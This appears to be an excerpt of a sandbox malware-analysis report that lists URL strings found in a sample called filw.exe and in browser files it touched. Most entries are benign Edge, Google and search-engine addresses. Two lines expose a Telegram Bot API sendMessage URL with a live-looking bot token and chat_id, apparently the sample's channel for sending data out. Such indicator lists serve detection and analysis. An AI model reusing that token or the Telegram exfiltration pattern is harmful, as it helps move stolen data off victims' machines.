Source: filw.exe, 00000000.00000002.1993398707.0000019D126E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7043342993:AAH3tTE7nerxLSr5-SkYKVrmJwCoBBaGRCU/sendMessage
Source: filw.exe, 00000000.00000002.1993398707.0000019D125B7000.00000004.00000800.00020000.00000000.sdmp, filw.exe, 00000000.00000002.1993398707.0000019D12746000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7043342993:AAH3tTE7nerxLSr5-SkYKVrmJwCoBBaGRCU/sendMessage?chat_id=69676
Source: chromecache_605.8.dr, chromecache_600.8.dr	String found in binary or memory: https://apis.google.com
Source: 2cc80dabc69f58b6_1.16.dr	String found in binary or memory: https://assets.msn.cn/resolver/
Source: 2cc80dabc69f58b6_1.16.dr	String found in binary or memory: https://assets.msn.com/resolver/
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://bard.google.com/
Source: 2cc80dabc69f58b6_1.16.dr	String found in binary or memory: https://bit.ly/wb-precache
Source: 2cc80dabc69f58b6_1.16.dr	String found in binary or memory: https://browser.events.data.msn.cn/
Source: 2cc80dabc69f58b6_1.16.dr	String found in binary or memory: https://browser.events.data.msn.com/
Source: Reporting and NEL0.16.dr	String found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
Source: 2cc80dabc69f58b6_1.16.dr	String found in binary or memory: https://c.msn.com/
Source: tmp9493.tmp.dat.0.dr, tmp94C3.tmp.dat.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: offscreendocument_main.js.16.dr, service_worker_bin_prod.js.16.dr	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/mathjax/
Source: Web Data.16.dr, tmp9493.tmp.dat.0.dr, tmp94C3.tmp.dat.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Web Data.16.dr, tmp9493.tmp.dat.0.dr, tmp94C3.tmp.dat.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Network Persistent State.16.dr	String found in binary or memory: https://chrome.cloudflare-dns.com
Source: manifest.json.16.dr	String found in binary or memory: https://chrome.google.com/webstore/
Source: manifest.json.16.dr	String found in binary or memory: https://chromewebstore.google.com/
Source: 30658114-af5e-4b61-bd0d-1b38c5b04174.tmp.17.dr	String found in binary or memory: https://clients2.google.com
Source: manifest.json0.16.dr	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: 30658114-af5e-4b61-bd0d-1b38c5b04174.tmp.17.dr	String found in binary or memory: https://clients2.googleusercontent.com
Source: chromecache_605.8.dr	String found in binary or memory: https://clients6.google.com
Source: chromecache_605.8.dr	String found in binary or memory: https://content.googleapis.com
Source: 2cc80dabc69f58b6_0.16.dr	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: manifest.json0.16.dr	String found in binary or memory: https://docs.google.com/
Source: chromecache_605.8.dr	String found in binary or memory: https://domains.google.com/suggest/flow
Source: manifest.json0.16.dr	String found in binary or memory: https://drive-autopush.corp.google.com/
Source: manifest.json0.16.dr	String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: manifest.json0.16.dr	String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: manifest.json0.16.dr	String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: manifest.json0.16.dr	String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: manifest.json0.16.dr	String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: manifest.json0.16.dr	String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: manifest.json0.16.dr	String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: manifest.json0.16.dr	String found in binary or memory: https://drive-preprod.corp.google.com/
Source: manifest.json0.16.dr	String found in binary or memory: https://drive-staging.corp.google.com/
Source: manifest.json0.16.dr	String found in binary or memory: https://drive.google.com/
Source: Web Data.16.dr, tmp9493.tmp.dat.0.dr, tmp94C3.tmp.dat.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Web Data.16.dr, tmp9493.tmp.dat.0.dr, tmp94C3.tmp.dat.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Web Data.16.dr, tmp9493.tmp.dat.0.dr, tmp94C3.tmp.dat.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 000003.log9.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
Source: 000003.log10.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtrac
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_163_music.png/1.0.3/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_dark.png/1.7.32/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_hc.png/1.7.32/asset
Source: HubApps Icons.16.dr, f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_amazon_music_light.png/1.4.13/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_apple_music.png/1.4.12/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_bard_light.png/1.0.1/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_hc.png/1.0.3/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_dark.png/1.0.3/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_light.png/1.0.3/asse
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_deezer.png/1.4.12/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_dark.png/1.0.6/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_light.png/1.0.6/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_color.png/1.0.14/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_hc.png/1.0.14/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_hc.png/1.1.12/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_dark.png/1.1.12/asset
Source: HubApps Icons.16.dr, f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_hc.png/1.2.0/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_dark.png/1.2.0/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_light.png/1.2.0/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_excel.png/1.7.32/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_facebook_messenger.png/1.5.14/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gaana.png/1.0.3/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc.png/1.7.1/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_controller.png/1.7.1/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_joystick.png/1.7.1/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark.png/1.7.1/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_controller.png/1.7.1/
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_joystick.png/1.7.1/as
Source: HubApps Icons.16.dr, f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_controller.png/1.7.1
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_joystick.png/1.7.1/a
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gmail.png/1.5.4/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_help.png/1.0.0/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_iHeart.png/1.0.3/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_hc.png/1.0.14/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_dark.png/1.0.14/as
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_light.png/1.0.14/a
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_instagram.png/1.4.13/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_ku_gou.png/1.0.3/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_last.png/1.0.3/asset
Source: 000003.log9.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_dark.png/1.1.0/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_hc.png/1.1.0/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_light.png/1.1.0/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_naver_vibe.png/1.0.3/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_dark.png/1.4.9/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_hc.png/1.4.9/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_light.png/1.4.9/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_dark.png/1.9.10/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_hc.png/1.9.10/asset
Source: HubApps Icons.16.dr, f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_hc.png/1.1.0/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_dark.png/1.1.0/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_light.png/1.1.0/asse
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_power_point.png/1.7.32/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_qq.png/1.0.3/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_dark.png/1.1.12/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_hc.png/1.1.12/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_light.png/1.1.12/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_hc.png/1.1.3/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_dark.png/1.1.3/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_light.png/1.1.3/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
Source: HubApps Icons.16.dr, f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.1.12/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.1.12/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.1.12/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
Source: HubApps Icons.16.dr, f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_dark.png/1.3.20/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_hc.png/1.3.20/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_light.png/1.3.20/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_sound_cloud.png/1.0.3/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_spotify.png/1.4.12/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_dark.png/1.2.19/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_hc.png/1.2.19/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_light.png/1.2.19/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_telegram.png/1.0.4/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_hc.png/1.0.5/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_dark.png/1.0.5/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_light.png/1.0.5/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tidal.png/1.0.3/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tik_tok_light.png/1.0.5/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_hc.png/1.5.13/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset
Source: HubApps Icons.16.dr, f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_twitter_light.png/1.0.9/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_vk.png/1.0.3/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whats_new.png/1.0.0/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whatsapp_light.png/1.4.11/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_word.png/1.7.32/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_yandex_music.png/1.0.10/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_youtube.png/1.4.14/asset
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://excel.new?from=EdgeM365Shoreline
Source: chromecache_600.8.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
Source: chromecache_600.8.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
Source: chromecache_600.8.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
Source: chromecache_600.8.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://gaana.com/
Source: filw.exe, 00000000.00000002.2003165019.0000019D2B130000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
Source: filw.exe, 00000000.00000002.2003618026.0000019D2B320000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/dotnet/corefx/tree/32b491939fbd125f304031c35038b1e14b4e3958
Source: filw.exe, 00000000.00000002.2003618026.0000019D2B320000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/dotnet/corefx/tree/32b491939fbd125f304031c35038b1e14b4e39588
Source: filw.exe, 00000000.00000002.2004857913.0000019D2B800000.00000004.08000000.00040000.00000000.sdmp, filw.exe, 00000000.00000002.1993398707.0000019D12AFA000.00000004.00000800.00020000.00000000.sdmp, filw.exe, 00000000.00000002.1993398707.0000019D12B41000.00000004.00000800.00020000.00000000.sdmp, filw.exe, 00000000.00000002.2003547527.0000019D2B300000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/dotnet/corefx/tree/7601f4f6225089ffb291dc7d58293c7bbf5c5d4f
Source: filw.exe, 00000000.00000002.2004857913.0000019D2B800000.00000004.08000000.00040000.00000000.sdmp, filw.exe, 00000000.00000002.1993398707.0000019D12AFA000.00000004.00000800.00020000.00000000.sdmp, filw.exe, 00000000.00000002.1993398707.0000019D12B41000.00000004.00000800.00020000.00000000.sdmp, filw.exe, 00000000.00000002.2003547527.0000019D2B300000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/dotnet/corefx/tree/7601f4f6225089ffb291dc7d58293c7bbf5c5d4f8
